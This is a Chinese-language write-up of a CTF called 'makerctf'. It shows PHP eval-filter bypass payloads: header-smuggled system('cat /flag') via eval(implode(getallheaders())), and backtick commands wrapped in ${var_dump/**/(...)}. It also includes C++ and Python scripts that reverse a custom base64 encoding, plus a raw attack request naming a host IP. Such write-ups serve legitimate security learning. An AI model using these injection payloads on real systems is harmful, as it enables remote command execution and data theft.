makerctf

抛开一切,讲讲两道巧妙的web题目

(?R)递归正则的绕过

  • 可以在https://ctftime.org/writeup/10150找到思路
  • implode 函数:把数组的各元素拼接成一个字符串,此处把请求头数组拼接成一个字符串。
  • getallheaders()获取请求头,由此构造执行参数。
    我们在第一个请求头后面添加注释,这样执行时就能绕过。需要注意的是,代码只检查了请求参数,并没有检查请求头,这就留下了可利用的空间。
GET /w1nd_web1.php?magic=eval(implode(getallheaders()));/*hello%20w1nd*/ HTTP/1.1
eval: system('cat /flag');//

easy_eval


打开后看到有 addslashes 函数,查阅函数说明可知,它会在单引号和双引号前加上反斜杠进行转义。

  • 我们这里用反引号(`)执行内部命令。(Linux 下的用法)
  • 如果直接函数加(会被正则检查到,可以用注释/**/的方式绕过。
  • 在 eval 中直接给变量赋值无法执行命令,可以通过 ${} 让大括号里的内容先被求值。
    首先构造
cmd=${var_dump/**/(`ls`)} 

查看目录文件

cmd=${var_dump/**/(`cat flag.php`)}

查看flag

其他

// ConsoleApplication1.cpp : 此文件包含 "main" 函数。程序执行将在此处开始并结束。
//

#include "pch.h"
#include 
#include
#include
#include
#include
#include
#include 
#include 
#include
using namespace std;
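char Dst[100] = { 0 };                                     // output buffer filled by work()
char Dst_Str[] = "vDi/gDh3]s:pEtjq:6EB9qjq9[be9-8~)*i(";  // target the brute force must reproduce

// Custom base64-style encoder lifted from the target binary.
// Encodes the first 3-byte group of source_Str into the global Dst using a
// shuffled 64-character alphabet. The 6-bit groups are formed exactly as in
// base64, but a missing 2nd/3rd byte is padded with 'M' (77) instead of '='.
// Only the first group is processed (the loop in the original was disabled),
// so at most 4 characters plus the NUL terminator are written to Dst.
// Parameters: source_Str - NUL-terminated input; the binary expects exactly
//             3 bytes and complains (but still encodes) otherwise.
// Returns nothing; the result is left in Dst.
void work(char* source_Str) {
    static const char middle_str[] = "@,.1fjsz^+{5bkrA&=}6a8D9E:gv)]ux$~\"3dity%_;w#`/2ehlqB*-[70mpC(4c";
    const char kPad = 77;  // 'M': the binary's padding character
    // Work on unsigned bytes so the shifts/masks below are well defined for
    // values >= 0x80; the original relied on a non-standard `byte` typedef,
    // which collides with std::byte under `using namespace std` in C++17.
    const unsigned char* src = reinterpret_cast<const unsigned char*>(source_Str);
    const std::size_t len_str = std::strlen(source_Str);
    if (len_str != 3) {
        std::cout << "LEN_SOUTCE_ERROR!\n";
        std::system("pause");  // kept from the original: pause, then encode anyway
    }

    int out = 0;
    const unsigned char b0 = src[0];
    Dst[out++] = middle_str[(b0 >> 2) & 0x3F];
    const unsigned int carry0 = (b0 << 4) & 0x30;  // low 2 bits of b0 -> high bits of index 1
    if (len_str < 2) {
        Dst[out++] = middle_str[carry0];
        Dst[out++] = kPad;
        Dst[out++] = kPad;
    } else {
        const unsigned char b1 = src[1];
        Dst[out++] = middle_str[((b1 >> 4) & 0x0F) | carry0];
        const unsigned int carry1 = (b1 << 2) & 0x3C;  // low 4 bits of b1 -> high bits of index 2
        if (len_str < 3) {
            Dst[out++] = middle_str[carry1];
            Dst[out++] = kPad;
        } else {
            const unsigned char b2 = src[2];
            Dst[out++] = middle_str[((b2 >> 6) & 0x03) | carry1];
            Dst[out++] = middle_str[b2 & 0x3F];
        }
    }
    Dst[out] = '\0';
}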

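// Entry point: brute-forces each 4-character group of Dst_Str.
// Every 3-byte input in [1,125]^3 is encoded with work() and printed when its
// output reproduces the current group. Prints "begin" and the group offset as
// progress; matches are printed as "Input: ... Output: ...".
int main() {
    char tmp[4] = { 0 };
    std::cout << "begin" << std::endl;
    // Hoisted out of the loop condition: the target never changes.
    const std::size_t target_len = std::strlen(Dst_Str);
    for (std::size_t t = 0; t < target_len; t += 4) {
        std::cout << t << std::endl;  // flushed on purpose: progress for a long-running search
        for (int i = 1; i <= 125; i++)
            for (int j = 1; j <= 125; j++)
                for (int z = 1; z <= 125; z++) {
                    // No memset needed: for a 3-byte input work() always writes
                    // Dst[0..3] and NUL-terminates at Dst[4].
                    tmp[0] = static_cast<char>(i);
                    tmp[1] = static_cast<char>(j);
                    tmp[2] = static_cast<char>(z);
                    tmp[3] = 0;
                    work(tmp);
                    // Dst_Str's length is a multiple of 4, so the 4-byte compare
                    // never runs past the target.
                    if (!std::strncmp(Dst, Dst_Str + t, 4))
                        std::printf("Input: %s Output: %s\n", tmp, Dst);
                }
    }
    return 0;
}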
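# Recovers the string that the reversed binary compares the encoded input
# against. `a` is a memory dump in which each value occupies four entries:
# the data byte followed by three 0x00 entries.
a = [
0x61, 0x00, 0x00, 0x00, 0x70, 0x00, 0x00, 0x00, 0x61, 0x00, 0x00, 0x00, 0x56, 0x00, 0x00, 0x00,
0x74, 0x00, 0x00, 0x00, 0x4D, 0x00, 0x00, 0x00, 0x72, 0x00, 0x00, 0x00, 0x2D, 0x00, 0x00, 0x00,
0x7E, 0x00, 0x00, 0x00, 0x6F, 0x00, 0x00, 0x00, 0x41, 0x00, 0x00, 0x00, 0x32, 0x00, 0x00, 0x00,
0x10, 0x00, 0x00, 0x00, 0x66, 0x00, 0x00, 0x00, 0x58, 0x00, 0x00, 0x00, 0x58, 0x00, 0x00, 0x00,
0x2A, 0x00, 0x00, 0x00, 0x87, 0x00, 0x00, 0x00, 0x6F, 0x00, 0x00, 0x00, 0x6E, 0x00, 0x00, 0x00,
0x32, 0x00, 0x00, 0x00, 0x47, 0x00, 0x00, 0x00, 0x5C, 0x00, 0x00, 0x00, 0x71, 0x00, 0x00, 0x00,
0x3B, 0x00, 0x00, 0x00, 0x92, 0x00, 0x00, 0x00, 0x3B, 0x00, 0x00, 0x00, 0x63, 0x00, 0x00, 0x00,
0x37, 0x00, 0x00, 0x00, 0x57, 0x00, 0x00, 0x00, 0x2C, 0x00, 0x00, 0x00, 0x5E, 0x00, 0x00, 0x00,
0x85, 0x00, 0x00, 0x00, 0x94, 0x00, 0x00, 0x00, 0x47, 0x00, 0x00, 0x00, 0x33, 0x00, 0x00, 0x00
]
# Take every fourth entry (the data byte of each group). Unlike filtering out
# zeros, this keeps a genuine 0x00 data byte in its position.
t = [int(i) for i in a[::4]]
# The binary's 64-character alphabet and its per-position xor key.
middle1 = '''@,.1fjsz^+{5bkrA&=}6a8D9E:gv)]ux$~"3dity%_;w#`/2ehlqB*-[70mpC(4c'''
middle2 = [23, 43, 54, 124, 23, 12, 4, 21, 43, 21, 13, 87, 65, 45, 32, 56, 32, 64, 24, 25, 39, 67, 44, 43, 26, 34, 67, 45, 34, 23, 54, 65, 76, 89, 76, 56]
# Undo the transform: subtract the position, then xor with the key byte.
s1 = ""
for i in range(len(middle2)):
    t[i] -= i
    t[i] ^= middle2[i]
    s1 += chr(t[i])
print(s1)
# Map each recovered character to its index in the alphabet; characters
# that are not in the alphabet are skipped, as in the original script.
n = []
for ch in s1:
    idx = middle1.find(ch)
    if idx != -1:
        n.append(idx)
print(n)
print(len(n))
print(len(t))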

https://ctftime.org/writeup/10150

GET /w1nd_web1.php?magic=eval(implode(getallheaders()));/*hello%20w1nd*/ HTTP/1.1
cmd: system('cat /flag');//
Host: 62.234.153.161
Cache-Control: max-age=0
Upgrade-Insecure-Requests: 1
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/73.0.3683.103 Safari/537.36
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3
Accept-Encoding: gzip, deflate
Accept-Language: zh-CN,zh;q=0.9,en;q=0.8
Connection: close

